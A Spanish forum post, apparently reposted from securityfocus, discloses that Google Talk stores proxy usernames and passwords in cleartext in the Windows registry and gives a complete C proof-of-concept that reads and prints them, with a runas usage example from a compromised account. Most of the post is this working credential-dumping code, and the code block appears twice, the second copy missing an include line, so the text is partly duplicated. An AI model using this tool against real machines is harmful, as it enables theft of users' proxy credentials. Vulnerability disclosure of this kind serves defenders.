Google Talk guarda en el registro de Windows dos conjuntos de credenciales y no los protege con el mismo cuidado. El primero son las credenciales de la cuenta de Gmail, necesarias para establecer la conexión con talk.google.com, que se localizan en:
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[username]@gmail.com\pw
En este caso la contraseña parece estar cifrada (o al menos ofuscada). Sin embargo, los programadores de Google Talk parecen haber olvidado aplicar cualquier mecanismo de cifrado al guardar las credenciales del proxy a través del cual se realiza la conexión: tanto el nombre de usuario como la contraseña del proxy se almacenan en *texto claro* (cleartext) en el registro de Windows. En Windows lo esperable sería proteger estos valores con DPAPI (CryptProtectData), que los liga a la cuenta del usuario, en lugar de guardarlos tal cual.
Tales credenciales se localizan en:
HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_user
HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_pass
Para explotar esta debilidad deben cumplirse tres requisitos:
a) Que la víctima se conecte a través de un proxy al usar Google Talk.
b) Que el proxy requiera autenticación (usuario y contraseña).
c) Que el atacante pueda ejecutar código con la cuenta de Windows de la víctima: los valores están bajo HKEY_CURRENT_USER, por lo que la prueba de concepto se lanza con runas desde la cuenta comprometida.
Prueba de Concepto:
Código:
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n"
/*
Author: pagvac (Adrian Pastor)
Date found: 12th Oct, 2005
Filename: google-talk-dump-proxy-credentials.c
Example of usage:
C:\>runas /user:compromised-account cmd.exe
Enter the password for compromised-account: [password entered]
Attempting to start cmd.exe as user "target-host\compromised-account" ...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>e:
E:\>cd "my exploits"
E:\my exploits>google-talk-dump-proxy-credentials.exe
Proxy host: 192.168.1.10
Port number: 8080
Username: compromised_username
Password: compromised_password
*/
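/*
 * Returns TRUE when the per-user Google Talk key exists under HKCU.
 *
 * The key is opened read-only and closed at once; only its existence
 * matters here. The handle is closed only when RegOpenKeyEx succeeded:
 * on failure no valid handle is returned, and the original code passed
 * the uninitialised hKey to RegCloseKey.
 */
BOOL googleTalkIsInstalled(void)
{
    HKEY hKey = NULL;
    LONG returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                     "Software\\Google\\Google Talk",
                                     0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    RegCloseKey(hKey);
    return TRUE;
}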
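/*
 * Reads a string value from HKCU\Software\Google\Google Talk\Options.
 *
 * lszVal2Query: name of the value to read (e.g. "proxy_host", "auth_pass").
 * lszValData:   buffer of at least 255 bytes that receives the
 *               NUL-terminated string on success; untouched on failure.
 * Returns TRUE on success, FALSE if the key or value is missing, the
 * value is not a string type, or the data does not fit the buffer.
 *
 * Registry string data is not guaranteed to carry a NUL terminator and
 * RegQueryValueEx does not filter by type, so both are checked before
 * the bytes are treated as a C string; the original code ran strcpy on
 * the raw buffer and closed an uninitialised handle on open failure.
 */
BOOL QueryStrVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey = NULL;
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof(lszResult) - 1; /* keep one byte for a terminator */
    LONG returnStatus;
    BOOL ok = FALSE;

    returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                "Software\\Google\\Google Talk\\Options",
                                0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,
                                   (LPBYTE)lszResult, &dwSize);
    /* ERROR_MORE_DATA (value longer than the buffer) counts as failure. */
    if (returnStatus == ERROR_SUCCESS &&
        (dwType == REG_SZ || dwType == REG_EXPAND_SZ) &&
        dwSize < sizeof(lszResult))
    {
        lszResult[dwSize] = '\0'; /* terminate even if the stored data was not */
        memcpy(lszValData, lszResult, dwSize + 1);
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}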
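/*
 * Reads a REG_DWORD value from HKCU\Software\Google\Google Talk\Options.
 *
 * lszVal2Query: name of the value to read (e.g. "proxy_port").
 * dwVal:        receives the value on success; untouched on failure.
 * Returns TRUE on success, FALSE if the key or value is missing or the
 * stored data is not exactly a 4-byte REG_DWORD.
 *
 * The returned type and size are checked so that a string or binary
 * value of another length is not reinterpreted as a number; the
 * original code accepted whatever came back and closed an uninitialised
 * handle when the key could not be opened.
 */
BOOL QueryDwordVal(char lszVal2Query[255], DWORD *dwVal)
{
    DWORD dwResult = 0;
    HKEY hKey = NULL;
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof(dwResult);
    LONG returnStatus;
    BOOL ok = FALSE;

    returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                "Software\\Google\\Google Talk\\Options",
                                0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,
                                   (LPBYTE)&dwResult, &dwSize);
    if (returnStatus == ERROR_SUCCESS &&
        dwType == REG_DWORD &&
        dwSize == sizeof(DWORD))
    {
        *dwVal = dwResult;
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}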
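/*
 * Entry point: dumps Google Talk's proxy settings for the current user,
 * including any proxy credentials stored in the clear.
 *
 * Everything is read from HKCU, so the program must run in the security
 * context of the account being inspected (the usage example above uses
 * runas). The password is written to stdout as-is, so redirecting or
 * logging the output exposes it.
 */
int main(void)
{
    char lszData[255];
    DWORD dwData;

    printf(TITLE);
    printf("By pagvac (Adrian Pastor)\n");
    printf("www.ikwt.com (In Knowledge We Trust)\n\n");

    if (!googleTalkIsInstalled())
    {
        printf("Google Talk does *not* seem to be installed for the current user\n");
        return 0;
    }

    /* Without a proxy_host value there is nothing proxy-related to dump. */
    if (!QueryStrVal("proxy_host", lszData))
    {
        printf("No proxy settings were found!\n");
        printf("Probably Google Talk is connecting *directly* to the Internet...\n");
        return 0;
    }
    printf("Proxy host:\t%s\n", lszData);

    /* DWORD is unsigned long on Win32; the original printed it with %d. */
    if (!QueryDwordVal("proxy_port", &dwData))
        printf("Port number:\t%d\n", 1080); /* author's assumed default when no proxy_port is stored - TODO confirm */
    else
        printf("Port number:\t%lu\n", (unsigned long)dwData);

    /* A missing or empty auth_user means the proxy needs no username. */
    if (!QueryStrVal("auth_user", lszData) || lszData[0] == '\0')
        printf("(no username required)\n");
    else
        printf("Username:\t%s\n", lszData);

    /* Same for auth_pass; this is the cleartext credential the PoC is about. */
    if (!QueryStrVal("auth_pass", lszData) || lszData[0] == '\0')
        printf("(no password required)\n");
    else
        printf("Password:\t%s\n", lszData);

    return 0;
}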
#include <stdio.h>
#include <string.h>
#define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n"
/*
Author: pagvac (Adrian Pastor)
Date found: 12th Oct, 2005
Filename: google-talk-dump-proxy-credentials.c
Example of usage:
C:\>runas /user:compromised-account cmd.exe
Enter the password for compromised-account: [password entered]
Attempting to start cmd.exe as user "target-host\compromised-account" ...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>e:
E:\>cd "my exploits"
E:\my exploits>google-talk-dump-proxy-credentials.exe
Proxy host: 192.168.1.10
Port number: 8080
Username: compromised_username
Password: compromised_password
*/
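/*
 * Returns TRUE when the per-user Google Talk key exists under HKCU.
 *
 * The key is opened read-only and closed at once; only its existence
 * matters here. The handle is closed only when RegOpenKeyEx succeeded:
 * on failure no valid handle is returned, and the original code passed
 * the uninitialised hKey to RegCloseKey.
 */
BOOL googleTalkIsInstalled(void)
{
    HKEY hKey = NULL;
    LONG returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                     "Software\\Google\\Google Talk",
                                     0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    RegCloseKey(hKey);
    return TRUE;
}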
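/*
 * Reads a string value from HKCU\Software\Google\Google Talk\Options.
 *
 * lszVal2Query: name of the value to read (e.g. "proxy_host", "auth_pass").
 * lszValData:   buffer of at least 255 bytes that receives the
 *               NUL-terminated string on success; untouched on failure.
 * Returns TRUE on success, FALSE if the key or value is missing, the
 * value is not a string type, or the data does not fit the buffer.
 *
 * Registry string data is not guaranteed to carry a NUL terminator and
 * RegQueryValueEx does not filter by type, so both are checked before
 * the bytes are treated as a C string; the original code ran strcpy on
 * the raw buffer and closed an uninitialised handle on open failure.
 */
BOOL QueryStrVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey = NULL;
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof(lszResult) - 1; /* keep one byte for a terminator */
    LONG returnStatus;
    BOOL ok = FALSE;

    returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                "Software\\Google\\Google Talk\\Options",
                                0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,
                                   (LPBYTE)lszResult, &dwSize);
    /* ERROR_MORE_DATA (value longer than the buffer) counts as failure. */
    if (returnStatus == ERROR_SUCCESS &&
        (dwType == REG_SZ || dwType == REG_EXPAND_SZ) &&
        dwSize < sizeof(lszResult))
    {
        lszResult[dwSize] = '\0'; /* terminate even if the stored data was not */
        memcpy(lszValData, lszResult, dwSize + 1);
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}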
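/*
 * Reads a REG_DWORD value from HKCU\Software\Google\Google Talk\Options.
 *
 * lszVal2Query: name of the value to read (e.g. "proxy_port").
 * dwVal:        receives the value on success; untouched on failure.
 * Returns TRUE on success, FALSE if the key or value is missing or the
 * stored data is not exactly a 4-byte REG_DWORD.
 *
 * The returned type and size are checked so that a string or binary
 * value of another length is not reinterpreted as a number; the
 * original code accepted whatever came back and closed an uninitialised
 * handle when the key could not be opened.
 */
BOOL QueryDwordVal(char lszVal2Query[255], DWORD *dwVal)
{
    DWORD dwResult = 0;
    HKEY hKey = NULL;
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof(dwResult);
    LONG returnStatus;
    BOOL ok = FALSE;

    returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER,
                                "Software\\Google\\Google Talk\\Options",
                                0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,
                                   (LPBYTE)&dwResult, &dwSize);
    if (returnStatus == ERROR_SUCCESS &&
        dwType == REG_DWORD &&
        dwSize == sizeof(DWORD))
    {
        *dwVal = dwResult;
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}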
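/*
 * Entry point: dumps Google Talk's proxy settings for the current user,
 * including any proxy credentials stored in the clear.
 *
 * Everything is read from HKCU, so the program must run in the security
 * context of the account being inspected (the usage example above uses
 * runas). The password is written to stdout as-is, so redirecting or
 * logging the output exposes it.
 */
int main(void)
{
    char lszData[255];
    DWORD dwData;

    printf(TITLE);
    printf("By pagvac (Adrian Pastor)\n");
    printf("www.ikwt.com (In Knowledge We Trust)\n\n");

    if (!googleTalkIsInstalled())
    {
        printf("Google Talk does *not* seem to be installed for the current user\n");
        return 0;
    }

    /* Without a proxy_host value there is nothing proxy-related to dump. */
    if (!QueryStrVal("proxy_host", lszData))
    {
        printf("No proxy settings were found!\n");
        printf("Probably Google Talk is connecting *directly* to the Internet...\n");
        return 0;
    }
    printf("Proxy host:\t%s\n", lszData);

    /* DWORD is unsigned long on Win32; the original printed it with %d. */
    if (!QueryDwordVal("proxy_port", &dwData))
        printf("Port number:\t%d\n", 1080); /* author's assumed default when no proxy_port is stored - TODO confirm */
    else
        printf("Port number:\t%lu\n", (unsigned long)dwData);

    /* A missing or empty auth_user means the proxy needs no username. */
    if (!QueryStrVal("auth_user", lszData) || lszData[0] == '\0')
        printf("(no username required)\n");
    else
        printf("Username:\t%s\n", lszData);

    /* Same for auth_pass; this is the cleartext credential the PoC is about. */
    if (!QueryStrVal("auth_pass", lszData) || lszData[0] == '\0')
        printf("(no password required)\n");
    else
        printf("Password:\t%s\n", lszData);

    return 0;
}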
Fuente:securityfocus
Salu2















